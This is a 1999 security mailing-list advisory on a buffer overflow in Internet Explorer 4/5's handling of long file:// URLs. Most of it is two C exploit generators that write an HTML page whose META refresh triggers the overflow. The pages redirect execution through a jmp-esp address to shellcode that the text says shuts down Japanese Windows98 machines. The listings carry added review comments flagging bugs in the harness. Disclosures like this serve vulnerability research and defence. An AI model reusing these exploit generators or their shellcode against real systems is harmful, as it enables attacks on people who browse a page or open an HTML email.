IE4/5 "file://" buffer overflow

From: UNYUN (shadowpenguinat_private)
Date: Mon Nov 08 1999 - 12:44:22 PST


    Hello
    
    Microsoft Internet Explorer 4/5 overflows when handling a
    "file://" specification. This overflow occurs when we are logging on to
    the Microsoft Network; the overflow can be verified if a long name is
    specified for "file://". For example,
    
    file://test/AAAAAAAAAAAA.... (long 'A')
    
    This is a typical exploitable buffer overflow, because the overflow
    overwrites the RET address and can control the EIP. If you try the
    previously described example, you will be able to confirm "EIP 41414141H"
    in the GPF dialog box. The RET is stored at 39H,40H,41H,42H from the
    byte following "file://".
    
    This overflow opens the possibility of virus and trojan infection,
    system destruction, intrusion, and so on.
    
    This overflow opens the possibility of virus and trojan
    infection, system destruction, intrusion, and so on. If this overflow is
    used by an attacker, arbitrary code can be sent to the visitors who browse
    the exploiting page, and the client host will be compromised. This overflow
    also causes a problem in many kinds of e-mail client software. If the user
    opens an HTML mail which contains the exploit code, the exploit code
    will be executed, because much e-mail software uses IE for
    browsing HTML mail.
    
    We coded the following sample code. This code generates an HTML file
    that reboots the client PC. It was tested on Windows98 Japanese
    Edition.
    
    ---
    /*=============================================================================
       Microsoft IE4 for Windows98 exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguinat_private)
      =============================================================================
    */
    
    #include    <stdio.h>
    #include    <windows.h>
    
    /* Number of padding bytes written into the file:// URL; buf in main()
       is declared with exactly this many elements. */
    #define     MAXBUF          1000
    /* Offset in buf at which main() stores the 4-byte address returned by
       search_mem(): buf[RETADR..RETADR+3] receive it, buf[RETADR-1] is 0x90. */
    #define     RETADR          53
    
    
    /* (start, end) address pairs handed to search_mem() from main():
       mems[i] is the start and mems[i+1] the end of each range, and the
       trailing 0,0 pair terminates main()'s loop ("Can not find jmp code").
       The values are taken from the author's own environment (the text says
       Windows98 Japanese Edition); nothing here is derived at run time. */
    unsigned int mems[]={
    0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
    0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
    0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
    0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
    0xbffc9000,0xbffe3000,0,0};
    
    /* Payload bytes copied into buf at offset 80 by main().  main() measures
       them with strlen(), so the array is treated as a NUL-terminated string:
       the final 0x00 is the terminator and any earlier zero byte would cut
       the copy short.  The accompanying text says the payload shuts the
       machine down; that behaviour is not verified here. */
    unsigned char   exploit_code[200]={
    0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
    0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
    0xFF,0xD0,0x00,
    };
    
    /*
       Read the bytes at raw addresses [st, ed) in this process and look for
       the byte pair c1,c2.  Returns the address of the first match none of
       whose four address bytes is 0x00, or 0 if no such match exists.
       The zero-byte filter is presumably because main() embeds the address
       in a string that is emitted with "%s", where a zero byte would end
       the string early - TODO confirm.
       fp is accepted but never used.
       Review notes: *(p+1) is read when p == ed-1, i.e. one byte beyond the
       requested range; the (unsigned int) cast of a pointer assumes 32-bit
       pointers; and if any range is not readable the dereference faults.
    */
    unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
                    unsigned char c1,unsigned char c2)
    {
        unsigned char   *p;
        unsigned int    adr;
    
        for (p=st;p<ed;p++)
            if (*p==c1 && *(p+1)==c2){
                adr=(unsigned int)p;
                /* skip any match whose address contains a 0x00 byte */
                if ((adr&0xff)==0) continue;
                if (((adr>>8)&0xff)==0) continue;
                if (((adr>>16)&0xff)==0) continue;
                if (((adr>>24)&0xff)==0) continue;
                return(adr);
            }
        return(0);
    
    }
    
    
    /*
       Entry point.  Writes to argv[1] an HTML file whose META refresh points
       at a file:// URL built from buf: MAXBUF bytes of 0x41, the address found
       by search_mem() at offset RETADR, and exploit_code at offset 80.
       Returns FALSE (0) both on success and when fopen() fails, so the exit
       status does not distinguish the two; the search failure exits with 1.
       Review notes on this harness as written:
         - buf has MAXBUF elements, so buf[MAXBUF]=0 writes one byte past the
           end of the array (undefined behaviour).  Because memset() fills all
           of buf with 0x41 and the payload is copied without its terminator,
           no byte inside buf terminates the string that "%s" prints.
         - strlen() is applied to an unsigned char array; it only stops at
           the 0x00 that ends exploit_code.
         - exit() is called without including <stdlib.h>; whether windows.h
           provides the declaration depends on the compiler.
         - main has no declared return type (implicit int, pre-C99 only).
    */
    main(int argc,char *argv[])
    {
        FILE                    *fp;
        unsigned int            i,ip;
        unsigned char           buf[MAXBUF];
    
        if (argc<2){
            printf("usage %s output_htmlfile\n",argv[0]);
            exit(1);
        }
        if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
        fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
        /* walk the (start,end) pairs in mems[]; the 0,0 pair ends the list */
        for (i=0;;i+=2){
            if (mems[i]==0){
                printf("Can not find jmp code.\n");
                exit(1);
            }
            /* fp is passed along but search_mem() ignores it */
            if ((ip=search_mem(fp,(unsigned char *)mems[i],
                (unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
        }
        printf("Jumping address : %x\n",ip);
        memset(buf,0x41,MAXBUF);
    
        /* store ip little-endian at RETADR..RETADR+3, preceded by 0x90 */
        buf[RETADR-1]=0x90;
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=(ip>>24)&0xff;
    
        memcpy(buf+80,exploit_code,strlen(exploit_code));
        /* out-of-bounds: valid indices are 0..MAXBUF-1 */
        buf[MAXBUF]=0;
        fprintf(fp,"%s/\">\n<HTML><B>",buf);
        fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
        fprintf(fp,"If you are using IE4 for Japanese Windows98, ");
        fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
        fprintf(fp,"</HTML>\n");
        fclose(fp);
        printf("%s created.\n",argv[1]);
        return FALSE;
    }
    
    /*=========================================================================
       Microsoft IE45 for Windows98 exploit
       The Shadow Penguin Security (http://shadowpenguin.backsection.net)
       Written by UNYUN (shadowpenguinat_private)
      =========================================================================
    */
    
    #include    <stdio.h>
    #include    <windows.h>
    
    /* Number of padding bytes written into the file:// URL; buf in main()
       is declared with exactly this many elements. */
    #define     MAXBUF          1000
    /* Offset in buf at which main() stores the 4 bytes of EIP:
       buf[RETADR..RETADR+3] receive them, buf[RETADR-1] is 0x7f. */
    #define     RETADR          53
    
    /*
        jmp esp (FF E4) code is stored in this area.
        You must change this address for non-Japanese Windows98
    */
    /* Hard-coded for the author's environment; unlike the first listing,
       this version does not search memory for the address at run time. */
    #define     EIP             0xbfb75a35
    
    /* Payload bytes copied into buf at offset 80 by main().  main() measures
       them with strlen(), so the array is treated as a NUL-terminated string:
       the final 0x00 is the terminator and any earlier zero byte would cut
       the copy short.  The accompanying text says the payload shuts the
       machine down; that behaviour is not verified here. */
    unsigned char   exploit_code[200]={
    0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53,
    0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3,
    0x00
    };
    
    /*
       Entry point.  Writes to argv[1] an HTML file whose META refresh points
       at a file:// URL built from buf: MAXBUF bytes of 0x41, the constant
       EIP at offset RETADR, and exploit_code at offset 80.
       Returns FALSE (0) both on success and when fopen() fails, so the exit
       status does not distinguish the two.
       Review notes on this harness as written:
         - buf has MAXBUF elements, so buf[MAXBUF]=0 writes one byte past the
           end of the array (undefined behaviour).  Because memset() fills all
           of buf with 0x41 and the payload is copied without its terminator,
           no byte inside buf terminates the string that "%s" prints.
         - strlen() is applied to an unsigned char array; it only stops at
           the 0x00 that ends exploit_code.
         - exit() is called without including <stdlib.h>; whether windows.h
           provides the declaration depends on the compiler.
         - main has no declared return type (implicit int, pre-C99 only).
         - buf[RETADR-1] is 0x7f here, whereas the IE4 listing uses 0x90;
           the reason for the difference is not stated.
    */
    main(int argc,char *argv[])
    {
        FILE                    *fp;
        unsigned int            ip;
        unsigned char           buf[MAXBUF];
    
        if (argc<2){
            printf("usage %s output_htmlfile\n",argv[0]);
            exit(1);
        }
        if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
        fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
    
        memset(buf,0x41,MAXBUF);
        /* fixed address from the EIP macro; no run-time search here */
        ip=EIP;
        /* store ip little-endian at RETADR..RETADR+3, preceded by 0x7f */
        buf[RETADR-1]=0x7f;
        buf[RETADR  ]=ip&0xff;
        buf[RETADR+1]=(ip>>8)&0xff;
        buf[RETADR+2]=(ip>>16)&0xff;
        buf[RETADR+3]=( ip>>24)&0xff;
        memcpy(buf+80,exploit_code,strlen(exploit_code));
        /* out-of-bounds: valid indices are 0..MAXBUF-1 */
        buf[MAXBUF]=0;
        fprintf(fp,"%s/\">\n<HTML><B>",buf);
        fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
        fprintf(fp,"If you are using IE5 for Japanese Windows98, ");
        fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
        fprintf(fp,"</HTML>\n");
        fclose(fp);
        printf("%s created.\n",argv[1]);
        return FALSE;
    }
    
    
    -----
    UNYUN
    % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ]
       shadowpenguinat_private (webmaster)
    % eEye Digital Security Team [ http://www.eEye.com ]
       unyunat_private
    


